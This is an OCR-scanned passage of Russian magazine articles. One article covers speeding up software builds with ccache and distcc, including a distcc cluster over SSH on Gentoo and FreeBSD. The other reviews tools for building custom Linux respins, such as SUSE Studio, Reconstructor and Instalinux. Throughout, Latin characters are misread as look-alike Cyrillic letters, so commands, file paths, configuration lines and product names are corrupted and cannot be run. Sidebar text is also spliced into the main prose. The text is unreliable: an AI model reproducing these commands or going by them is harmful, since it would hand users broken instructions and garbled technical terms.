ляции приложения. В некоторых случаях прирост может составлять 
десятки раз. 

Для задействования ссасбе достаточно установить его в систему и 
запускать процесс сборки приложения с помощью примернотакой 
команды: 



$ СС="ссас]те дсс" СХХ="ссасЪе д++" . /сопкідиге 
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Зависимость скорости компиляции ЗатЬа Графический монитор сіізісстоп-апоте в 

отссасЬе действии 



Закэшированные препроцессором объектные файлы 
хранятся в каталоге -Лссасбе. По умолчанию его размер 
ограничен 1 Гб, но я бы порекомендовал увеличить его до 
4 Гб: 



$ ссаске -М 40 

Если места в домашнем каталоге будет недостаточно для 
хранения кэша, ты можешьуказать ссасбе использовать 
другой каталог: 

$ еско " ехрогб ССАСНЕ_БІК=\ " /ѵаг/Дтр/ 
ссаске/ \ " " >> -/.Ъазкгс 



Для верности создай симлинк: 

$ гш -гТ -/.ссаске 

$ 1п -з /ѵаг/бтр/ссаске -/.ссаске 

Особое место ссасбе занимает в системах, основанных на 
портах. Компиляция утилит, необходимыхтолько во время 
сборки порта, статических библиотек и других «одноразо- 
вых» инструментов, в таких системах обычно осуществля- 
ется каждый раз во время сборки порта, ихтребующего. 
Поэтому ссасбе приносит неоценимую пользу. К то му же, 
уже существующие в кэше файлы могут быть повторно 
использованы при обновлении портов. Ниже приводит- 
ся два рецепта использования ссасбе: в дистрибутиве 
бепіоо и в ОС РгееВЗО. 

Для активации ссасбе в Оепіоо достаточно выполнить два 
простых действия: 



1. Установить ссасМе: 

$ зисіо ешегде -аѵ ссаске 

2. Отредактировать файл /еІс/таке.сопТ: 

$ зисіо ѵі /еСс/таке . сопП 

# Активируем ссаске 
ЕЕАТТЖЕ5 = " ссаске " 

# Место хранения кэша 
ССАСНЕ_БІЕ= " /ѵаг/ Стр /ссаске/ " 

# Размер кэша 
ССАСНЕ_8І2Е= " 4С" 



После выполнения этих действий все порты будут соби- 
раться с использованием ссасбе. Чтобы активировать 
ссасбе во время сборки ядра с помощью депкегпеі, следу- 
ет использовать следующую команду: 

$ зисіо депкегпеі --кегпе1-сс = /изг/1іЬ/ 
ссаске/Ып/дсс --шеписопіід аіі 

В случае с РгееВЗО все несколько сложнее, но вполне в 
рамках разумного: 



1. Устанавливаем ссасМе: 

$ ссі /изг/рогкз/сіеѵеі/ссаске 
$ зисіо таке іпзкаіі сіеап 

2. Редактируем /еіс/таке.сопк 

$ зисіо ѵі /екс/таке . сопі 

# Если переменная окружения Ш_САСНЕ не 
определена, активируем ссаске 

. і 1 'сіе 1 іпесі ( Ш_САСНЕ ) 

СС=/изг/1оса1/1іЪехес/ссаске/ѵ\гаг1с1-сс 
ССХ=/изг/1оса1/1іЬехес/ ссаске /ѵ\гог1с1-с + + 
. епсііі 

# Отключаем ссаске при сборке самого себя 
Л± ${ . СітвіК:М*/рогкз/с1еѵе1/ссаске} 

КЮ_ССАСНЕ=уез 
. епбіі 



2. Редактируем -/.сзИгс (или -/.ЬавИгс): 



$ зибо ѵі -/.сзкгс 

# Стандартные переменные ссаске 

зекепѵ РАТН /изг/Іосаі/ІіЬехес/ссаске : $РАТН 
зекепѵ ССАСНЕ_РАТН /изг /Ьіп : /изг / Іосаі /Ьіп 
зекепѵ ССАСНЕ_ВІЕ /ѵаг /ктр/ссаске 
зекепѵ ССАСНЕ_кОСЕІЬЕ /ѵаг/іод/ссаске . Іод 

# Устанавливаем размер кэша 

ІТ ( -х /изг/1оса1/Ьіп/ссаске ) ккеп 




• В дистрибутиве 
Вепіюо различные 
флаги компиляции 
портов можно акти- 
вировать индивиду- 
ально для каждого 
порта (см. файл /еХс/ 
рогіаде/раскаде. 
скадз]. Это можно 
использовать для 
принудительного 
отключения ссасбе и 
сіізіхс при сборке оп- 
ределенных портов. 

• Присвоив опции 
РОПТАВ Е_І\ІІСЕМЕ55 
файла Мс/таке. 
сопі в дистрибутиве 
Вепіюо слишком 
большое значение, 
ты можешь собс- 
твенноручно сильно 
замедлить скорость 
сборки приложений. 

• Программы ссасбе 
и сі ізісс отлично 
уживаются вместе. 

В Оепіюоты можешь 
активировать их 
одновременно, 
добавив строку 
РЕАТ0НЕ5="ссасЬе 
сіібіюс" в файл /еіс/ 
таке.сопГ 
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ІосаІ/Ьіп/ссасЪе -М 4С > /сіеѵ/пиіі 

епсііі 

Для отключения ссасЬе во время сборки определенного порта ис- 
пользуем такую команду вместо стандартного «таке іпзіаіі сіеап»: 

$ зисіо таке Ж)_САСНЕ=уез іпзкаіі сіеап 

РАСПРЕДЕЛЕННАЯ 

КОМПИЛЯЦИЯ 

Увеличить скорость компиляции можно с помощью при влечения к 
этому процессу других машин. Я не говорю се йчасо сборке при- 
ложения на более мощной машине с последующим копированием 
результата на менее производительную (хотя это тоже вариант], я 
говорю об организации кластера из машин, каждая из которых будет 
принимать участие в сборке одного приложения. Поднять такой клас- 
тер достаточно просто, и для этого мы воспользуемся инструментом 
под названием сі ізісс. 

О ізісс - это обертка для дсс, которая позволяетзадействовать 
мощности других машин для увеличения скорости компиляции 
приложения. В отличие от других решений этого класса, сі ізісс прост в 
установке и не требует модификации исходного кода приложения или 
каких-либо подготовительных действий. На удаленную машину пере- 
дается уже обработанный препроцессором исходный код, поэтому со 
своей стороны она не должна иметь каких-либо заголовочных файлов 
или библиотекдля проведения успешной компиляции. 

Кластер сі ізісс обычно состоит из одного клиента и нескольких 
серверов. Клиент запускается на машине, инициирующей процесс 
сборки, и передает задания на выполнение компиляции серверам, 
работающим на удаленных машинах. Задание состоит из обра- 
ботанного препроцессором файла, содержащего исходный код, и 
флагов компилятора. Все это отправляется на сервер с помощью 
обычного сетевого соединения без какого-либо шифрования и ау- 
тентификации удаленной стороны. Серверы, фактически выполня- 
ющие компиляцию, могут работать под управлением операционных 
систем І_іпих, *В50, Эоіагіз или ѴѴіпсіоѵѵз (потребуется установка дсс 
и сі І5Ісс в окружение судѵѵіп], однако версия дсс на этих машинах 
должна быть одинаковой. 

Нет смысла использовать сіізісс для одноразовой сборки прило- 
жения, с этим вполне справится и один комп. Зато в дистрибутиве 
Сепіюо и ОС РгееВЗО он может дать заметный прирост в скорости 
установки и обновления приложений. Сепіюо уже подготовлен для 
использования сі ізісс, поэтому его владельцам достаточно выпол- 
нить несколько простых шагов для активации обертки. 

Сначала установим сі ізісс на все машины кластера: 



Для задания хостов, участвующих в компиляции, воспользуемся 
утилитой сі ізісс-сопбід (на самом деле, она все го лишь модифицирует 
значение переменной 0І5ТСС_Н05Т5): 

$ зисіо сИзксс-сопіід --зеС-бюзСз "127.0.0.1 
192.168.0.1 192.168.0.2 192.168.0.3" 

Вместо ІР-адресов можно использовать ОЫЭ-имена машин. Чтобы 
более равномерно распределить нагрузку по машинам, через слэш 
после адреса машины ты можешьуказать одновременное количест- 
во заданий, которое она может принять. Например, если на машине 
192.168.0.1 установлен четырехъядерный процессор, то общее коли- 
чество заданий для нее лучше установить в пять: 1 92.1 68.0.1/5. 

Далее на всех машинах необходимо запустить сервер. Для этого 
отредактируем файл /еіс/сопі.сі/сі ізісссі , чтобы разрешить выполнение 
заданий, полученных от клиентов нашей подсети: 

ВІ8ТССБ_ОРТ8= " $ { ВІЗТССБ_ОРТ8 } -аііо ѵг 192.168.0.0/24" 

Теперь добавим сервер в дефолтов ый уровень запуска и запустим его: 

$ зисіо гс-ирсіаСе асісі сіізксссі сіеіаиІС 
$ зисіо /еСс/іпіС . сі/сіізСсссі зСагС 

Теперь все порты будут компилироваться в кластере сіізіюс. Чтобы соб- 
рать ядро с использованием сіізіюс, используй следующую команду: 

$ зисіо депкегпеі --кегпе1-сс=с1із1ісс аіі 

В отличие от Сепіюо, РгееВЗО не обладает инфраструктурой, необходи- 
мой для прозрачного внедрения сіізіюс, поэтому нам придется вживлять 
егохирургическим путем. Для этого установим сі ізісс с помощью системы 
портов: 

$ ссі /изг/рогкз/сіеѵеІ/сіізЦсс 
$ зисіо таке іпзкаіі сіеап 

Это нужно сделать на всех машинах, которые будут участвовать в процес- 
се компиляции. Далее активируем сервер сіізіюс в /еіс/гс.сопі та к, чтобы 
он запускался во время инициализации ОС и мог принимать задания от 
клиента: 

сИзСсссі_епаЫе= " УЕЗ " 

сіізЦсссі_11адз= " --пісе 5 --аііоѵг 192.168.1.0/24 
--сіаетоп --изег сіізксс -Р /ѵаг/гип/сіізЦсссі.рісі" 




$ зисіо етегде сІіеЬсс 

Далее переходим на ма шину- клиент и редактируем файл /еію/таке. 
сопі: 

$ зисіо ѵі /еіс/таке . сопі 

# Указываем количество потоков компиляции 
МАКЕОРТ8= " - 5 8 " 

# Активируем сіізСсс 
Е Е АТІЖЕ 8 = " сі і з С с с " 

# Каталог для хранения кэша сИзСсс 
БІ8ТСС_БІК= " / Стр / . сіізСсс " 

В опции МАКЕ0РТ5 указываем общее количество потоков компиля- 
ции. Обычно это число высчитывается следующим образом: общее 
количество процессоров/ядер на всех машинах * 2 + 1 . Однако это не 
всегда верно, и, возможно, придется поэкспериментировать, чтобы 
подобрать оптимальное значение. 



Этот шагтакже необходимо выполнить на всех машинах, включая 
клиентскую (чтобы компиляция происходила и на машине, ее иниции- 
ровавшей). Флаг '--аиоѵѵ' задает подсеть, машины которой имеют право 
отправлять задания серверу. Запускаем сервер: 

$ зисіо /изг/іосаі/екс/гс . сі/сИзСсссі зСагС 

Возвращаемся на клиентскую машину. Открываем файл /еію/таке. сопі и 
добавляем в него следующие строки: 

# ѵі /еіс/таке . сопі 

# Использовать сІізЦсс в качестве компилятора 
СС = сіізЦсс 

СХХ = сіізксс 

# Количество задач 
МАКЕ_АКС8 =- з 8 

Мы указали сіізіюс в переменных СС и СХХ, благодаря чему порты и мир будут 
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автоматически собираться в кластере, для распределения сборки всего 
остального пойдем на небольшойтрюки подменим стандартные компиля- 
торы дсс и д++: 

# тксііг -р /изг/ 1 оса 1 / 1 іЪ/с 1 ізксс/Ъіп 

# сб. /изг/1оса1/1іЪ/с1ізксс/Ъіп 

# 1п -з /изг/1оса1/Ъіп/с1ізксс дсс 

# 1 п -з /изг/ 1 оса 1 /Ъіп/с 1 ізксс д++ 

# 1п -з /изг/ІосаІ/Ъіп/сІізксс сс 

# 1 п -з /изг/ІосаІ/Ьіп/сІізІюс с++ 

Откроем /гооіУ.сзбгси поместим созданный нами каталог в начала путей 
поиска бинарников: 

зекепѵ РАТН /изг/ІосаІ/ІіЪ/сіізксс/Ъіп : $РАТН 

Туда же поместим инициализацию переменной 0І5ТСС_Н05Т, кото- 
рая будет содержать адреса сіізіхс-серверов: 

зекепѵ БІЗТСС_Н08ТЗ "127.0.0.1 192.168.1.2 
192.168.1.3 192.168.1.4" 

Все, для проверки можно запустить сборку какого-либо порта. 

Пакет сіізіхс поставляется вместе с утилитой для мониторинга про- 
цесса сборки бізіссппоп-іехі;. Запустив программу без параметров, 
ты увидишь на экране текущее состояние бізісс. Чтобы получать све- 
дения в режиме реального времени, используй команду «сіізіюсппоп- 
Іехі N1», где N - это интервал в секундах между выводом информации 
на экран. Пользователи Споте (и нетолько] могут воспользоваться 
графическим монитором под названием сіізіхсппоп-дпоппе. 

Не все порты могут быть прозрачно собраны с использованием сіізісс. 
В Сепіюо они явно помечены как«нераспределяемые», поэтому 
сборка будет про и сходить только на машине-клиенте. Во РгееВЭО все 
сложнее, здесь нет интеграции с сі ізісс, поэтому при возникновении 
проблем со сборкой первым делом следует отключить сі ізісс, заком- 
ментировав строку опции СС и СХХ в /еХ с/таке. сопі и убрав /изг/іоса I/ 
Іі Ь/сІ ізісс/Ьі п из путей поиска бинарников. 

КОМПИЛЯЦИЯ В ОБЛАКЕ 

Программа сі і зісс становится эффективным решением, когда речь 
заходит о сборке приложения в кластере машин, размещенных в 
локальной сети, но в силу своей незащищенности она не может 
быть применена для распределения компиляции по машинам, раз- 
бросанным по всему миру. Ты можешь создать частную ѴРІ\І, чтобы 
обойти эту проблему, но я предлагаю более простое и эффективное 
решение - 55 Н -туннель. 

Все нижеприведенные инструкции актуальны для дистрибутива 
Сепіюо, но не составит большого труда подогнать их под другой 
дистрибутив/ОС. 

Для начала активируем пользователя сі ізісс. Он автоматически 
создается во время установки порта, но не может выполнять вход в 
систему. Чтобы организовать туннель между машинами, нам нужно 
это исправить. Во-первых, пользователь должен иметь домашний 
каталог (пусть будет /еіс/сі ізісс) : 

# тксііг -р /екс/бізксс/ . ззк 

# изегтосі -сі /екс/бізксс бізксс 

Во-вторых, ему должен быть назначен шелл: 

# изегтосі -з /Ъіп/ЪазЪ. бізксс 
В-третьих, он должен быть разлочен: 

# раззші -и бізксс 



Эти три шага необходимо проделать на всех машинах. Чтобы кли- 
ент мог логиниться на машины -рабочие с использованием ззб и 
отдавать задания сі і зісс, он должен иметь ключ: 

# ззк-кеудеп -к сіза -к /екс/бізксс/ . ззк/ ісі_(іза 

Публичный ключ ( і сі_сі за . р и Ь) необходимо скопировать в каталог 
/еіс/сі І5ісс/.55Ь/а иіЬогІ2есІ_кеу5 всех машин, которые будут участво- 
вать в компиляции. 

Чтобы ззб и рогкаде смогли работать совместно, придется испра- 
вить права доступа. На машинах- рабочих выполняем команды: 

# скоші -К бізксс : баетоп /екс/бізксс 

# сЬтоб 644 /екс/бізксс/ . ззЪ./аиккюгІ 2 еб_кеуз 

На клиенте выполняем команды: 

# скоші рогкаде : рогкаде /екс/бізксс/ . ззЬ/іб_бза 

# сктоб 600 /екс/бізксс/ . ззк/іб_бза 

# сЪлюсі 644 /екс/бізксс/ . ззЪ./іб_бза . риЪ 

Чтобы во время выполнения етегде ззб не застрял на полпути с 
вопросом о принятии публичного ключа каждой машины-рабочего, 
заранее соберем все эти ключи: 

# ззЪ-кеузсап -к гза рабочийі рабочий2 рабочийЗ \ 

> /ѵаг/ктр/рогкаде/ . ззЪ./кпоѵт_Ъ.озкз 

# скюѵт рогкаде : рогкаде /ѵаг/ктр/рогкаде/ . ззк/ \ 

кпоѵт_кюзкз 

Теперь создадим обертку для сіізіюс: 



# ѵі /екс/сіізксс/сіізксс-ззіі 



# ! /Ьіп/Ьазк 

ехес /изг/Ьіп/ззк -і /екс/бізксс/ . ззк/іб_бза "$@" 
Сделаем ее исполняемой: 

# сктоб а+х /екс/бізксс/бізксс-ззЬ. 

Отредактируем файл /еХ с/таке. сопП 

# ѵі /екс/таке . сопі 



МАКЕОРТЗ=" - 38 " 

РЕАТІШЕ 8 = " бізксс " 

ВІ8ТСС_38Н= " /екс/бізксс/бізксс-ззк" 

БІЗТСС_НОЗТ 8 = " іосаікюзк /2 с!ізксс@рабочий1/3 бізкссО 
рабочий 2 /5 " 

Это все. 

УДАЧНОЙ КОМПИЛЯЦИИ 

Такие программы, как ссасбе и сі ізісс, вкупе с другими трюками, 
могут дать весьма существенный прирост в скорости сборки, однако 
ты должен иметь в виду, что не все приложения могут быть собраны 
с их помощью. Сборка некоторых сложных программ, состоящих из 
многих компонентов, часто завершается ошибкой, причину которой 
трудно идентифицировать. Поэтому будь внимателен, используй 
последнюю версию ссасбе и одинаковые версии дсс на маши- 
нах б І5ІСС- кластера, кроме того, не забывай заглядывать в файл 
ІЫЭТАП.з: 
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Юрий «Асіері» Видинеев а сі е р I 



Исполнители 

желании 



Обзор конструкторов популярных 
Ыпих дистрибутивов 

Многообразие — блеск и нищета мира Ыпих. РізігоѵѵаісЬ.соп знает 
о 649 дистрибутивах (включая все респины) — но я уверен, что знает он 
все-таки не про все. А что, если среди этого великого множества неттого, 
который нужен именнотебе? Не беда! Всегда можно сделать свой дистр, 
причем не прилагая особыхусилий. 



ВВЕДЕНИЕ 

Создание своего дистрибутива — дело 
затратное, хлопотное и не всегда оправдан- 
ное. В отличие от создания респина — слегка 
модифицированной версии существующего 
дистрибутива. Для чего может понадобиться 
создаватьсвой респин? Допустим, еслиты хо- 
чешь сделать ЫѵеСО с немного другим набором 
ПО (те же кодеки, например), другим оформле- 
нием или просто хочешь иметь инсталлятор со 
всеми обновлениями. 

Все средства для создания респинов можно 
условно разделить на 2 категории: веб и ло- 
кальные. Локальные, в свою очередь, делятся 
на имеющих С 1)1 и требующих вдумчивого 
чтения манов :). Из веб категории заслуживают 
внимания: 

•51ІЗЕ5ТІШІ0 — средство для создания респи- 
нов одноименного дистрибутива; 
•КЕС0М5ШСТ0К- проект для создания рес- 
пинов на основе ОеЬіап или ІІЬипІи; 



•Ш5ТАИШ- инструмент для создания 
пеЕтз^аІІ-систем на базе одного из шести 
дистрибутивов. 

Из категории локальных приложений можно 
отметить: 

• мши (шоміткш кіт — 0111-прога для 
создания респинов ІІЬипІи; 
•КЕСОМЗШСТОК-офла йновая версия одно- 
именного онлайного проекта; 

• КЕѴІ50Р — 0111-прога для создания респинов 
Ребога; 

• ЫѴЕСО-СКЕАТОК — Си-прога для создания 
респинов Ребога. 

МЕНЯЕМ ЦВЕТ ХАМЕЛЕОНА 

ЗЦЗЕЗШІО — средство от ІМоѵеІІ, позволяющее 
производителям ПО легко создавать закончен- 
ные программные решения для потребителей. 
Пользователь программного решения просто 
запускаетего в виртуальной машине (или с 
иѵеСР/иѵеІІЗВ) и получает рабочее приложе- 



ние без необходимости установки и настройки 
под него ОС (что поможет избежать многих 
ошибок). 

Регистрация на сайте 5изе ЗТибіо возможна 
только по и н вайтам (благо, и нвайт присылают 
быстро — мне пришел в течение часа). Логи- 
ниться на сайте можно по ОрепЮ или исполь- 
зуя аккаунт Соодіе, Ѵабоо или ІМоѵеІІ. 

После регистрации в системе для хранения 
своих сборок выделяется 1 5 Гб места. Сборка 
своего респина не вызываетзатруднений и 
состоит из 4 шагов: 

1. Выбор имени и основы для респина. В 
качестве основы могут выступать ОрепЗизе 
1 1 .2, 51І5Е Ыпих Епіегргізе 10 и 51І5Е Еіпих 
Епіегргізе 11 как в 32-х, так и 64-х битном 
исполнении. В качестве ОЕ можно выбрать 
Опоте, КОЕ или ІсеѴѴМ, или же вообще не 
использовать среду рабочего стола. 

2. Следующий шаг— выбор пакетов, из которых 
будет состоять наш респин. Радует, что система 
сама занимается разрешением зависимое- 
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Самый широкий выбор дистрибутивов 



тей. На этой же странице можно подключить сторонние 
репозитории или загрузить отдельные ПРМ. В стандарт- 
ных репозиториях ОрепЭизе есть около 8000 пакетов — в 
принципе, есть из чего выбрать. Удобно, что при выборе 
пакетов отображается размер как БіѵеСБ.таки уже установ- 
ленной системы. 

3. Третий шаг — конфигурация. На семи вкладках можно 
настроить практически все параметры системы: язык и 
часовой пояс, добавить юзеров, изменить лого или обои, 
сменить гипіеѵеі, настроить сервера БД (только Му50І_ и 
РозідгеЗОЦ включить автологин и добавить в автозапуск 
программы, настроить параметры виртуальной машины, 
задать скрипты, выполняющиеся при загрузке системы. 
Есть даже примитивные настройки файрвола. 

4 . Собственно, выбортипа респина (ЫѵеСО, образ НББ/ 
Еіазб или образ виртуальной машины] и его сборка. Сама 
сборка проходит на удивление шустро — у меня это занима- 
ло оттрех до десяти минут. 

Но самая удобная, как мне показалось, фишка сервиса — это 
возможность протестировать только что созданный респин 
прямо в браузере (функция Тезісігіѵе]. Для этого тебе на 
час выдается виртуальная машина КѴМ. Для более-менее 
нормальной работы этой функции нужен инетот2 Мбит/с. 
Кзапущенному респину можно будет даже подключиться 
по ззб или ѵпс. Жаль, что исходящие соединения заблоки- 
рованы :]. Внесенные в процессетестирования изменения 
можно будет сохранить с помощью функции «МосІібесІ Рііез», 
отображающей все измененные с момента запуска вирту- 
алки файлы. В целом, ЗизеЭіюсІіо производитвпечатление 
простого, удобного, стабильного и, вместе с тем, достаточно 
гибкого инструмента. Этим объясняется относительно 
высокая популярность проекта — в неделю здесь собирают 
более 4000 респинов. Единственный минус (хотя, для кого 
как] — это ограниченность в выборе базового дистрибутива 
для сборки. В общем, ппизі: изе для любителей Визе! 

ивимтщ реконструкция 

Весопзітисіюг, в отличии от предыдущего проекта, специа- 
лизируется на БеЬіап и БЬипІю. Проект «условно-платный» 
— после регистрации каждый месяцтебе начисляется $5, 
которые можно потратить на те или иные услуги проекта. 
Стоит отметить, что стоимость услуг довольно демократична 
(например, сборка проекта стоит$0,3], поэтому $5 в месяц 
особо фантазию не ограничивают. При желании, баланс 
можно влюбой момент пополнить через РауРаІ. 

При создании проекта на начальном этапе выбирается 
базовый дистрибутив (на моментнаписания статьи выбор 
состоял из БеЬіап 5, БЬипІю 9.04 и 9.10 архитектур х86 и 
х86-64], БЕ (Споте, КБЕ, Хіюе или Тех! Опіу] и тип респина 
(ЕіѵеСБ или образ диска). После создания проекта предла- 
гается выбрать дополнительные пакеты из стандартного 
репозитория, входящие втвой респин (зависимости разре- 
шаются, но это явно не отображается в списке установлен- 




Ресопзігисіог. Офлайн версия 

ных пакетов]. К сожалению, размер добавляемых пакетов 
отображается без учета зависимостей, поэтому следить за 
размером конечного образа проблематично. Кроме пакетов 
из стандартного репозитория, к проекту можно добавлять 
различные модули, реализующие тот или иной функционал. 
Вот некоторые из них: 

• АРТ КЕР05ІТ0КѴ И МШУ РРА РЕР05ІТ0РѴ — позволяют 

добавить кпроекту сторонний репозиторий. Правда, в 
списке доступных для установки пакетов пакеты из этих 
репозиториев не появятся, установку из них надо прописы- 
вать в специальный «Роз1:5сгір1»; 

• Ш5ТАИ РЕВ РАСКАСЕ — установить произвольный беЬ- 
пакет; 

•ЗѴЗТЕМиРВШЕ — позволяет провести апгрейд системы; 

• РРЕЗЕЕй — позволяет изменить Ргезеесі-файл; 
•ШЗТАИРИЕ — позволяетзагрузить файл в произвольное 
место в будущей ФС; 

• РАЗЛИЧНЫЕ МОДУЛИ ДЛЯ УЛУЧШЕНИЯ ВНЕШНЕГО ВИДА: за- 
дания темы, обоев, иконок, стартовой страницы Рігебох и т.д. 
Послетого, как все необходимые изменения внесены, мож- 
но начинать сборку проекта (кнопка « Ви іісі Рго]ес1» в левом 
верхнем углу]. Твое задание на сборку встанет в очередь, и 
через некоторое время (в зависимости от нагруженности 
сервиса и объема твоего задания) тебе на почту придет 
письмо об окончании процесса. Все мои проекты собира- 
лисьот 10 минут до часа. Собранный проектможно скачать 
втечении семи дней, после он будетудален. 
Примечательно, что исходники самого Ресопзітисіюг 
распространяются по лицензии ОРЕѵЗ, поэтомуты вполне 
можешь сам поднять подобный сервис. 

В целом, Ресопзітисіюг — хороший, хотя и не лишенн ый 
некоторых недостатков, сервис. В минусы можно записать 
ограниченность выбора базового дистрибутива, условную 
платность, невозможность вычисления конечного размера 
дистрибутива в процессе добавления пакетов. 

Некоторые из этих недостатков призвана решить офлайн 
версия, которую можно скачать со странички ѵѵѵѵѵѵ. 
гесопз1тис1югюгд/рго]ес1:5/гесоп5Ітис1юг/1 : і1.е5 . Причем 
доступ н ы две реда кци и : 

• КЕС0ЫЗТК11СТ0К ЕЫСІШЕ — данная версия позволяет соби- 
рать проекты, экспортированные из веб-интерфейса; 
•КЕСОМЗШСТОК- «полноценная» версия, имеющая все 
те же функции, что и веб-интерфейс, плюс еще несколько 
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Будь осторожен с 
автоматическим раз- 
биением винта. Семь 
раз отмерь, один — 
разбей! 




| НТТР://ѴѴѴѴѴѴ| 

"і Г 

> Ііпкз 

•Эйзе Эіюсііо: 
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•Весопзітисіюг: 

ЬирзУ/гесопзІтисІюг. 
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•ІпзЫіпих: 
ѵѵѵѵѵѵ.іпзіаііпих.сот 
ІІЬипІю сизіютігабоп 



•БЬипІи 

сизіютігабоп кіЕ 

ЬЕрУ/иск. 

зоигсеЬгде.пеІ: 

• Веѵізог: 
ЬНрУ/геѵізог. 
Іюсіогаипііуюгд 

•Саісиіаію Біпих 
ЭсгаІюЬ: 

ЬЕрУ/ѵѵѵѵѵѵ.саІсиІаІе- 

Ііпих.огд 

• Коллекция респи- 
нов Еебога. Не забудь 

ВЫЛОЖИТЬ СВОЙ! :] 

ШрУ/зріпз. 

1юсІогарго]есСогд 

• Отом, что такое кло- 
ны, форки, дериваты, 
респины и ремиксы, 
можно узнать из 
статьи Алексея Фе- 
дорчука ШрУ/сіікіС 
ги/агбсІез/1442/ . 
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Реѵізог 



интересных. Так как первая редакция — это, 
по сути, только локальный сборщик, обратим 
пристальное внимание на вторую. В отличие от 
веб-интерфейса, она позволяете небольшой 
погрешностью отслеживать размер будущего 
респина. Крометого, есть возможность запуска 
терминала в сбгооЫокружении будущей систе- 
мы, что открывает практически неограничен- 
ные возможности по кастомизации. Потенци- 
ально интересна также экспериментальная 
функция запуска иксов в сЬгооІ (правда, каки 
положено экспериментальной функции, у меня 
она не заработала ни на одной изтестовых ма- 
шин). Также, как и у веб-интерфейса, у офлайн 
версии есть модули — специальные скрипты на 
Вазб, выполняющиеся перед окончательной 
сборкой системы. Еще из интересных функций 
присутствуют: возможность удалить с диска все 
ѴѴіпсІоѵѵз- приложения (Рігебох, ТбипбегЬігб и 
т.д.) и возможность настройки запускающихся 
со стартом системы сервисов. 

МАСТЕР НА ВСЕ РУКИ 

Если два рассмотренных выше сервиса, в 
принципе, похожи друг на друга, то Іпзіаііпих 
отличается от них кардинально. Во-первых, 
никакой регистрации — просто заходи на сайт и 
начинай работать! Во-вторых, поддержка ряда 
крупныхдистрибутивов: СепЮ5, ОеЬіап, Еебога, 



ОрепЕИВЕ, Зсіепббс, ІІЬипШ. И, наконец, 
в-третьих, на выходе получится нетрадици- 
онный ЫѵеСО/инсталлятор, а пебпзіаіі-образ, 
который при установке скачивает все необхо- 
димое из инета. Специальный мастер позво- 
ляетза 6 шаговзадатьосновные параметры 
будущей системы. Кроме стандартных языка, 
раскладки и часового пояса можно опреде- 
литься с разбивкой винта (либо разбивать винт 
автоматически, либо настраивать разбиение 
в процессе установки). Другой важный шаг- 
выбор пакетов, входящих в будущую систему. 
Пакеты можно выбирать как группами (ставя 
галочки в чекбоксах), так и поодиночке (пропи- 
сывая названия пакетов в специальное поле). 
Последний шаг — задание рутового пароля 
(или пароля пользователя в случае с ІІЬипІи) и 
проверка конфигурации. После этого появится 
возможность скачать 150. Размер образа может 
варьироваться в зависимости от дистрибутива. 
Например, образ ІІЬипІи сХ^се занимает всего 
чуть больше 1 2 Мб, а вот Еебога 1 2 с ЕХЕЕ - целых 
227 Мб (есть подозрение, что это, скорее, багсер- 
виса). Скоростьскачивания образа не радует — у 
меня она не превышала 30 Кб/с, хотя притаких 
размерах это не критично. Кроме самого 150, на 
странице загрузки можно скачать получившийся 
конфиг РгезеесІ, КіскзЫгІ: или АиІоѴаВТ. Загру- 
зившисьс получившегося образа, набери ІпзІаІІ 



АВТОМАТИЗАЦИЯ УСТАНОВКИ 



С незапамятных времен во всех дистрибутивах естьтехнология, позволяющая авто- 
матически отвечать на вопросы установщика. В общем случае это вы глядит как файл с 
определенным именем в определенном формате, лежащий на диске (хотя он успешно 
может находиться и где-нибудь в сети). В ОеЬіап и его последователях данная технология 
называется ргезееб, в Еебога (Веб На*, СепЮ5 и т.д.) — кіекзіагі:, в ОрепВизе — АиЬѴаВТ. 
Подробнее об этом можно почитать здесь: 

ЬЦрУ/ѵѵікі.сІеЬіап.огд/РеЬіапІпзІаІІег/РгезеесІ 

ЬирѴЛебогаргоіесі.огдАллкі/АпасопсІа/Кіскзіагі 

Ьир://еп.орепзизе.огд/АиІоУа5Т 







Интерфейс ЗивеЗіисІіо 



для того, чтобы начатьустановку системы. 
ІпзЫІіпих предлагает также воспользоваться 
более продвинутой версией мастера, имеющей 
возможность ручного редактирования полу- 
чившегося РгезеесІ/КіскзІагѴАиІоѴаВТ файла. 
Кстати, разработчики обещаютскорое появле- 
ние поддержки профилей. В целом, приятный 
и полезный сервис. Если бы еще не ряд мелких 
недоработок! В частности, не очень прора- 
ботана конфигурация СепЮ5 (что признают 
сами разработчики сервиса). Например, у меня 
при нескольких конфигурациях при попытке 
установки системы выдавало: «Установочное 
дерево СепЮ5 в этом каталоге не соответствует 
вашему за грузоч ному диску». 

ДАЕШЬ ОЧЕРЕДНОЙ 

*ві»тл 

ІІЬипІи сизІотігаПюп к\і — еще одна офлайно- 
вая прога для кастомизации самого популяр- 
ного дистрибутива. С релиза іа и піу входит в 
официальный репозиторий. Но всеже лучше 
скачать последнюю версию с официального 
сайта. Для нормальной работы просит не менее 
5 Гб свободного места в домашней папке идо- 
ступ в инет. Процесс создания респина состоит 
из следующих шагов: 

•Настройка доступных в системе, а также при 
запуске ЫѵеСО, языков; 

• Выбор ЕЕ (варианты: кбе, дпоте, оібегз). 
Можно ничего не выбирать — получим систему 
без ЕЕ-, 

• На этом шаге надо указать системе на 150- 
образ оригинальной ІІЬипІи (КиЬипІи, ХиЬипіи, 
еѣс); 

• Выбор названия СО; 

• Хотим ли мы вручную настроить наш респин? 
Конечно хотим! Иначе получится стандартный 
дистрибутив; 

• Удалитьли все ѴѴіпбоѵѵз-приложения с Сй? 

• На следующем шаге можно запустить в сбгооі 
Вупарбс, консоль или продолжить сборку 
дистрибутива. По умолчанию включены только 
репозитории таіп и гезГгісГесІ , поэтому выбор 
пакетовдовольно скуден. Чтобы поправить 
эту ситуацию, в Вупарбс, в меню ВеШпдз- 
ВерозіЬгіез, нужно включить репозитории 
ипіѵегзе и тиШѵегзе и обновить список паке- 
тов. Если естьжелание более тонко настроить 
систему (например, сменить обои у ЫѵеСО) — 
можно запустить консоль в сбгооб Небольшой 
совет: выходить из консоли надо командой ехб, 
а не просто закрывая терм и нал — иначе проект 
рискует не собраться. 

• Когда все настройки закончены, можно смело 
жать«Сопбпие Ьиіісііпд». Дальше все зависит 
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ЦЬипІи сиэІопгшаПоп кД 



от мощности твоего компа — у меня на ноуте все собралось 
минут за 1 0. 

ФЕДОРИНО ГОРЕ 

Для другого популярного дистрибутива, Ребога, тоже есть 
удобные средства для создания респинов. Это 0111-прога 
Реѵізог и скрипт Ыѵессі-сгеаіогс СЫ-интерфейсом. Реѵізог 
представляет собой аналог ИСК и Песопзіхисіюгдля Ребога. 
Пожалуй, единственное существенное отличие — это то, что 
